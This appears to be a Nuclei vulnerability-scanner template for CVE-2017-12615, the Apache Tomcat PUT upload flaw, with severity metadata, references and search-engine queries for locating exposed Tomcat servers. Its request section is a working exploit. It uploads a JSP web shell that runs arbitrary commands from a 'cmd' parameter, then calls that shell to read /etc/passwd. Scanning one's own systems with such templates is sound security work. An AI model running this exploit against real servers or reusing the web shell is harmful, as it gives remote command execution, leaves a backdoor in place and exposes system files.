Apache Tomcat Servers - Remote Code Execution

id: CVE-2017-12615

info:
  name: Apache Tomcat Servers - Remote Code Execution
  author: pikpikcu
  severity: high
  description: |
    Apache Tomcat servers 7.0.{0 to 79} are susceptible to remote code execution. By design, you are not allowed to upload JSP files via the PUT method. This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server. However, due to the insufficient checks, an attacker could gain remote code execution on Apache Tomcat servers that have enabled PUT method by using a specially crafted HTTP request.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the affected server.
  remediation: |
    Apply the latest security patches or upgrade to a non-vulnerable version of Apache Tomcat.
  reference:
    - https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615
    - https://lists.apache.org/thread.html/8fcb1e2d5895413abcf266f011b9918ae03e0b7daceb118ffbf23f8c@%3Cannounce.tomcat.apache.org%3E
    - http://web.archive.org/web/20211206035549/https://securitytracker.com/id/1039392
    - https://nvd.nist.gov/vuln/detail/CVE-2017-12615
    - http://breaktoprotect.blogspot.com/2017/09/the-case-of-cve-2017-12615-tomcat-7-put.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2017-12615
    cwe-id: CWE-434
    epss-score: 0.96728
    epss-percentile: 0.99659
    cpe: cpe:2.3:a:apache:tomcat:7.0:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: apache
    product: tomcat
    shodan-query:
      - title:"Apache Tomcat"
      - http.title:"apache tomcat"
      - http.html:"apache tomcat"
      - cpe:"cpe:2.3:a:apache:tomcat"
    fofa-query:
      - body="apache tomcat"
      - title="apache tomcat"
    google-query: intitle:"apache tomcat"
  tags: cve2017,cve,rce,tomcat,kev,vulhub,apache,fileupload,intrusive

http:
  - method: PUT
    path:
      - "{{BaseURL}}/poc.jsp/"

    body: |
      <%@ page import="java.util.*,java.io.*"%>
      <%
      if (request.getParameter("cmd") != null) {
              out.println("Command: " + request.getParameter("cmd") + "<BR>");
              Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
              OutputStream os = p.getOutputStream();
              InputStream in = p.getInputStream();
              DataInputStream dis = new DataInputStream(in);
              String disr = dis.readLine();
              while ( disr != null ) {
                      out.println(disr);
                      disr = dis.readLine();
                      }
              }
      %>

    headers:
      Content-Type: application/x-www-form-urlencoded

  - method: GET
    path:
      - "{{BaseURL}}/poc.jsp?cmd=cat+%2Fetc%2Fpasswd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100f76ba87ee6950ae8993f54b86cb9d672dad2cad52e4046e468435c556ca24187022100e066b49b38722e0d123561d3d9a2d70dfda587fa91320c78e7bded44327b4eb9:922c64590222798bb761d5b6d8e72950